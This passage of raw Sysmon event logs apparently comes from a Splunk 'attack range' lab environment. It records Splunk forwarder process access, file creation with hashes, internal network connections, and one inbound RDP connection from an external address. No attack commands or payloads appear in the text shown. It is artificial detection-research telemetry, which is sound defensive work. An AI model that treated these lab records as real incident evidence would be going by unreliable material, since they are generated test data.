Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.585{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000810337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.163{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru22652-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000810336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.068{0C1E0330-F83E-60EB-E079-00000000D001}25562988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:28.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A743D074D9FF61BCD119D208FB6D40D,SHA256=BB78BA8F00A93AC421C12A9DB327635895C808F751829BC455F6EA7F2DF45E0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59AC4C8F32320048C01C8A8EC00000DC,SHA256=5CD4A68D9AE899A2B06F264CB220F22977A5F3BAA9E0868E08EA1E0C4CFFA853,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.272{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.272{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.272{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:29.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6741CC7483C58132B8312394E11C134,SHA256=ABACF3389CD6D8F533D5D4C7AFC97A8FDB3A5E737C7CEC20032140910A04CB3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:29.597{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AFBE331084E747BAF5B053D1D4A3D3E,SHA256=B30834A2725E740B6C521F2439A5DAD55CF3C1C06A3FC2DDCFE59C270234D3B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.610{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61965-false10.0.1.12-8000- 23542300x8000000000000000810368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:29.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AB2136391C4F7382B725A65225406BE,SHA256=DACA5D0F89C4FC1C2B828F713C90949FFA26993EDB6B52897D3FC0E5D2CD2123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:30.959{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C07E44094A3545F8E568B78646AB06,SHA256=76DBDFEEFA945E20E5C43EE4302509C3D5175D89E79BB6D6C0330D5FE32F5047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:30.612{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B4CD059D85B52E2BA58A7E50C653F1,SHA256=F8878340551A4B560D7B01EBC8ED667E9AC38C9166755C227D063AFA3BF2D0B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:29.186{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57459-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:30.209{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A65DC1FB8FB86280A2AEC9E30239EECA,SHA256=FFBDD5B830A8C2607336D68FAA6DE8F8A3DB74C7FA65679D14AAD0C429AE7FFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:31.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F37AAC636B84D5FADD5059BF6F68DC9,SHA256=75E78D043D4D817504E6698D6FB0D076D02C574C49FEC51541AF20B62BBD15E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:31.613{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159006FDB96131AE84A08F5E03353511,SHA256=6C38C96B5BCC20A31234C95EA6FB4AB71EECDD63DBE319B8478109A4CC142C13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:32.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67DE9A7DBE7728C503231F3853E78ED3,SHA256=717C6B17499D27212B0DE05BB0EFC9EA76DCF5B575D7E1283273B88682822887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:32.631{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DA9421507A826494B966600A63DC44,SHA256=8A067A4F23647BEB8F3B9E2E088059A2BB5E9698A76CB2999EE06EAE082809CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:33.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1740B0E1F7683E1314208D612FF5B9BF,SHA256=206F085263A495CCFB666F16D1F567908F769DDC28C5C864AE0DEAAECE95F718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:34.666{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8B0766E7A242A6C8BE37AE8170E621,SHA256=CA63F7DA6F6B690B25393137C1E5D4B31DE631BFED91290D58A65E324362FAFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:34.022{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48929CADCAF147094CA8559D69D3A905,SHA256=BCCD0C6C72BDE521AC9AD7ECD7D6002432321C23201CEA9ADD311F388ABD9BCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:34.066{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=FDBDE5508BB9A863E225C9B2B8B857E1,SHA256=1A47C63F0D9AD52D59DC705745D861F0BBF5E5F2E58F4A0F74EC846EF7968ABD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC0AAF5C8668A063BF0AFF458454F6C,SHA256=BDB2CE1DF2971BD8F9ABD7960E7CAC5F1DEEC65E57156B56F41EB4804F711DD6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:27.608{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61966-false10.0.1.12-8000- 354300x8000000000000000810377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:34.280{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57460-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 